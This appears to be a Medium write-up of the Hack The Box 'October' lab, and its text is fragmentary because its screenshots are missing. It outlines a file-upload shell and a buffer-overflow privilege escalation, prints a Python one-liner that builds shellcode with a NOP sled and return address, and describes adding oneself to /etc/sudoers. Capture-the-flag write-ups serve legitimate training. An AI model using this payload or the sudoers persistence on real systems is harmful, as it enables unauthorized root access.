October — HTB Walkthrough

ENUMERATION

Port 80 HTTP Enumeration

visiting website I found Login and register page
Backend folder found
Auth Page
We see we can upload malicious contents using any of these

EXPLOITATION

Getting shell as www-data
Getting User.txt

PRIVILEGE ESCALATION

On target machine
On your machine
We receive a segmentation fault at 0x64413764
We find this at 112.
Checking value at EIP register, we see it is filled with Bs’
It hits

4) Shellcode

5) Sending payload

We see A is overwritten on EIP
python -c ‘offset = 112;shell=””;shell +=”\xdb\xde\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x12\xbf\xff\xee\x16";shell +=”\x49\x83\xee\xfc\x31\x7e\x13\x03\x81\xfd\xf4\xbc\x4c\xd9\x0e”;shell +=”\xdd\xfd\x9e\xa3\x48\x03\xa8\xa5\x3d\x65\x67\xa5\xad\x30\xc7";shell +=”\x99\x1c\x42\x6e\x9f\x67\x2a\x7b\x55\x96\xba\x13\x6b\xa6\xab”;shell +=”\xbf\xe2\x47\x7b\x59\xa5\xd6\x28\x15\x46\x50\x2f\x94\xc9\x30";shell +=”\xc7\x49\xe5\xc7\x7f\xfe\xd6\x08\x1d\x97\xa1\xb4\xb3\x34\x3b”;shell +=”\x70\x39\xd4\xbf”;nop = “\x90”*(offset — len(shell));eip = “\xe4c\xfd\x95\xbf”;payload = nop + shell + eip;print(payload);’
ASLR was enabled
NX Enabled

Calculation

Getting ROOT Flag

POST EXPLOITATION

Since we have privilege to open and modify a file as ROOT. We will add ourselves to /etc/sudoers , such that we don’t need any password to run sudo. And then running su to switch to ROOT

References :

--

--

--

OSCP | CEH | Cyber Security Enthusiast.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Recovery : THM room, Writeup

Polkadot-js extension release update

“Low and Slow” Is How the Credit Card Fraudsters Roll

It’s A Game Changer

Introduction to ICEPAD

Pineapple 101: Modules’ Review and Testing (Part 2)

CyberSecLabs “Imposter” Writeup

Do Websites Allow Disposable Emails In 2022?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Dhanishtha Awasthi

Dhanishtha Awasthi

OSCP | CEH | Cyber Security Enthusiast.

More from Medium

Dissecting the Escobar bot

Hack the box shibboleth writeup :

Hacker101 Micro-CMS v1 CTF Walkthrough

Vulnversity Walkthrough — THM